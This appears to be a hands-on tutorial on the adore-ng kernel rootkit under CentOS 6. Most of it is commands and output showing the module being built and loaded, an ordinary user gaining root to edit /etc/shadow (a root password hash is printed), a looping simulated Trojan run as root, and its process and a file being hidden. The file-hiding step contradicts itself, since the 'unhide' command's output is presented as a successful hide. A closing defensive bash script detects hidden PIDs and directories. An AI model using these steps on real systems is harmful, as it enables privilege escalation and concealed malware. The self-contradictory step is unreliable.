A rootkit is a special kind of malicious software. Its job is to hide itself, and whatever files, processes and network connections it is told to hide, from the system it is installed on. In practice a rootkit is rarely used alone: it is usually combined with Trojans, backdoors and other malicious programs, whose presence it conceals.
Think of the mole who is a staple of spy films: good cover keeps the other side unaware for a long time; he wins the enemy's trust and so ends up in an important position, which lets him keep obtaining important information and pass it back through his own private channel.
What we will simulate today is a rootkit that plays the same role: adore-ng.
Environment: CentOS 6
Two resources are needed here (downloadable):
Installing adore-ng
Build dependency: the kernel-devel package matching the running kernel (here 2.6.32-754.27.1.el6), since the module is compiled against the kernel headers.
[root@Fp-01 ~]# yum -y install kernel-devel-2.6.32-754.27.1.el6.x86_64.rpm
Loaded plugins: fastestmirror, security
Setting up Install Process
......
Installed:
  kernel-devel.x86_64 0:2.6.32-754.27.1.el6
Complete!
Extract and build adore-ng
[root@Fp-01 ~]# unzip adore-ng-master.zip
[root@Fp-01 ~]# cd adore-ng-master
[root@Fp-01 adore-ng-master]# ll
-rw-r--r--. 1 root root 1143 Dec 30  2015 Makefile    # A Makefile is already provided, so it can be compiled directly with make -j 4
[root@Fp-01 adore-ng-master]# make -j 4
Load the module
[root@Fp-01 adore-ng-master]# insmod adore-ng.ko
View the help (running ava with no arguments prints the subcommands)
[root@Fp-01 adore-ng-master]# ./ava
I    print info (secret UID etc)
h    hide file              # Hide a file
u    unhide file            # Unhide a file
r    execute as root        # Run a command as root
R    remove PID forever     # Kill a PID permanently
U    uninstall adore        # Uninstall adore
i    make PID invisible     # Hide a PID
v    make PID visible       # Unhide a PID
Escalating an ordinary user to root
Add an ordinary user for the test
[root@Fp-01 ~]# useradd tom
[root@Fp-01 ~]# echo "123456" | passwd --stdin tom
Changing password for user tom.
passwd: all authentication tokens updated successfully.
Copy adore-ng to /tmp, because after switching to tom the user cannot enter /root, where the module was built (cp -r copies the directory recursively).
[root@Fp-01 ~]# cp -r adore-ng-master /tmp/
Switch users: log in to the server as tom
[root@Fp-01 ~]# ssh [email protected]
Are you sure you want to continue connecting (yes/no)? yes
[email protected]'s password:
[tom@Fp-01 ~]$ whoami
tom
Test: try to edit /etc/shadow
[tom@Fp-01 ~]$ vim /etc/shadow
......
"/etc/shadow" [Permission Denied]
Permission is denied, as expected for an ordinary user. Now run the same command through ava r, which asks the loaded module to execute it as root.
[tom@Fp-01 ~]$ /tmp/adore-ng-master/ava r vim /etc/shadow
56,501,501,56
Adore 1.56 installed. Good luck.
root:$6$tQrXvHNXMxM6eTuN$WJWqoN5bYKuy/PVxpVeWYLCCZ32OCur1rjHIvHOOytjLPPxRMV3jRB6IbENgA2ZBDWI0cwEOTBSwVnmmQlyT7.:18172:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
......
Looking at the process from another terminal shows that vim is running as root, so the escalation succeeded.
[root@Fp-01 ~]# ps -ef | grep /etc/shadow
root     32703 30867  0 12:03 pts/3    00:00:00 vim /etc/shadow
root     32727 32667  0 12:03 pts/4    00:00:00 grep /etc/shadow
Hiding a Trojan process
Simulate writing a Trojan
[tom@Fp-01 opt]$ /tmp/adore-ng-master/ava r mkdir script
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 opt]$ ll
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:09 script
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r vim a.sh
56,500,500,56
Adore 1.56 installed. Good luck.

#!/bin/bash
# Simulated Trojan body: append a line to date.txt once a second, forever
while :
do
    echo "This is the virus" >> date.txt
    sleep 1
done

This simple simulated Trojan just writes "This is the virus" once a second (the string must be in double quotes; backticks would make the shell try to execute it as a command). Give it execute permission and run it in the background, again through ava r.
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r chmod +x a.sh
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r ./a.sh &
[1] 33987
[tom@Fp-01 script]$ 56,501,501,56
Adore 1.56 installed. Good luck.
First check the process and note its PID.
[tom@Fp-01 script]$ ps -ef | grep 33987
root     33987 30867  0 12:14 pts/3    00:00:00 /bin/bash ./a.sh
root     34137 33987  0 12:14 pts/3    00:00:00 sleep 1
tom      34139 30867  0 12:14 pts/3    00:00:00 grep 33987
The script is visible and runs as root. Next, simulate the attacker hiding the process.
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava i 33987
56,501,501,56
Adore 1.56 installed. Good luck.
Made PID 33987 invisible.
The hide succeeded: listing the processes again no longer shows it (only the grep itself is left).
[tom@Fp-01 script]$ ps -ef | grep 33987
tom      34139 30867  0 12:14 pts/3    00:00:00 grep 33987
The big move: hiding files
First look at the files under /opt
[tom@Fp-01 ~]$ ll /opt/
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:14 script
[tom@Fp-01 ~]$ ll /opt/script/
total 32
-rwxrwxr-x. 1 root root    77 Feb 13 12:13 a.sh
-rw-rw-r--. 1 root root 24737 Feb 13 12:24 date.txt
[tom@Fp-01 ~]$ tree /opt/
/opt/
└── script
    ├── a.sh
    └── date.txt
Now simulate hiding date.txt. Note that, according to the help output above, h is the subcommand that hides a file and u the one that unhides it; the transcript below was captured with u, and ava accordingly reports the file as visible.
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava u date.txt
56,500,500,56
Adore 1.56 installed. Good luck.
File 'date.txt' is now visible.
Checking afterwards, even as root, the file is no longer listed:
[root@Fp-01 script]# tree /opt/
/opt/
└── script
    └── a.sh
[root@Fp-01 ~]# ll /opt/script/
total 48
-rwxrwxr-x. 1 root root 77 Feb 13 12:13 a.sh
The full chain: escalate to root -> hide the parent process -> the parent process starts the child (the virus) -> hide the folder.
The result is a Trojan that a system administrator relying on ps, ls and tree will struggle to find, because those tools ask the kernel for the listings the rootkit has filtered.
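To close the loop from the defender's side, here is a detection script added as an example for this page; it is neither the original post's code nor part of adore-ng. It assumes the hiding technique shown above: the rootkit filters directory listings (readdir) of /proc and of the filesystem, while a direct lookup of /proc/<pid> still succeeds, so probing PIDs one by one exposes what ps and ls /proc omit. It also assumes GNU coreutils (stat -c %h, find) on Linux and the usual directory link-count rule (2 + number of subdirectories, as on ext2/3/4, xfs and tmpfs). The function names find_hidden_pids and check_dir_link_count are this example's own.

```bash
#!/bin/bash
# Added example (not part of the original post or of adore-ng): two checks a
# defender can run against a PID- and file-hiding LKM of the kind demonstrated.
#
# Assumptions:
#  * The rootkit hides a PID or file by filtering directory listings (readdir),
#    while a direct lookup of /proc/<pid> still succeeds.
#  * GNU coreutils (stat -c %h, find) on Linux.
#  * A directory's link count is 2 + its number of subdirectories (ext2/3/4,
#    xfs, tmpfs); filesystems that report 1 (btrfs, some overlays) are skipped.
# The function names below are this example's own, not adore-ng or CentOS tools.

# Print PIDs that resolve under /proc but are missing from a listing of /proc.
# Optional argument: highest PID to probe (default: the kernel's pid_max).
find_hidden_pids() {
    local max_pid listed pid tgid found
    max_pid=${1:-$(cat /proc/sys/kernel/pid_max 2>/dev/null || echo 32768)}
    listed=$(ls /proc | grep -E '^[0-9]+$' || true)
    found=0
    pid=0
    while [ "$pid" -lt "$max_pid" ]; do
        pid=$((pid + 1))
        [ -d "/proc/$pid" ] || continue                       # no such process
        printf '%s\n' "$listed" | grep -qx "$pid" && continue   # listed, so not hidden
        # Thread IDs also resolve under /proc without appearing in the listing,
        # so only report thread-group leaders (Tgid == pid), which is exactly
        # what a hidden process looks like.
        tgid=$(awk '/^Tgid:/ {print $2}' "/proc/$pid/status" 2>/dev/null || true)
        [ "$tgid" = "$pid" ] || continue
        # Re-list before reporting, so a process that started after the first
        # listing is not mistaken for a hidden one.
        listed=$(ls /proc | grep -E '^[0-9]+$' || true)
        printf '%s\n' "$listed" | grep -qx "$pid" && continue
        if [ -d "/proc/$pid" ]; then
            echo "$pid"
            found=1
        fi
    done
    return "$found"
}

# Compare a directory's hard-link count with the subdirectories it shows.
# Returns 0 when consistent, 1 when the link count implies hidden
# subdirectories, 2 when the directory cannot be stat'ed.
check_dir_link_count() {
    local dir=$1 links visible
    links=$(stat -c %h "$dir" 2>/dev/null) || return 2
    if [ "$links" -lt 2 ]; then
        echo "$dir: filesystem does not maintain directory link counts, check skipped" >&2
        return 0
    fi
    visible=$(find "$dir" -mindepth 1 -maxdepth 1 -type d | wc -l)
    if [ "$links" -gt $((visible + 2)) ]; then
        echo "$dir: link count $links implies $((links - 2)) subdirectories, only $visible visible"
        return 1
    fi
    return 0
}

# Usage, e.g. after the demo above:   find_hidden_pids; check_dir_link_count /opt
```

Run it as root from a shell that was not started through ava. find_hidden_pids returns non-zero and prints the PID when it finds a thread-group leader that the /proc listing omits; the thread-ID filter matters, because every non-leader thread is reachable as /proc/<tid> yet absent from the listing, which would otherwise flood the output with false positives. A scan up to the kernel's pid_max takes a while on kernels with a large value, so pass a smaller bound when you only need the low range. check_dir_link_count only catches hidden directories, not hidden regular files such as date.txt above; for those, compare du against df, or mount the disk read-only from a clean system where the module is not loaded.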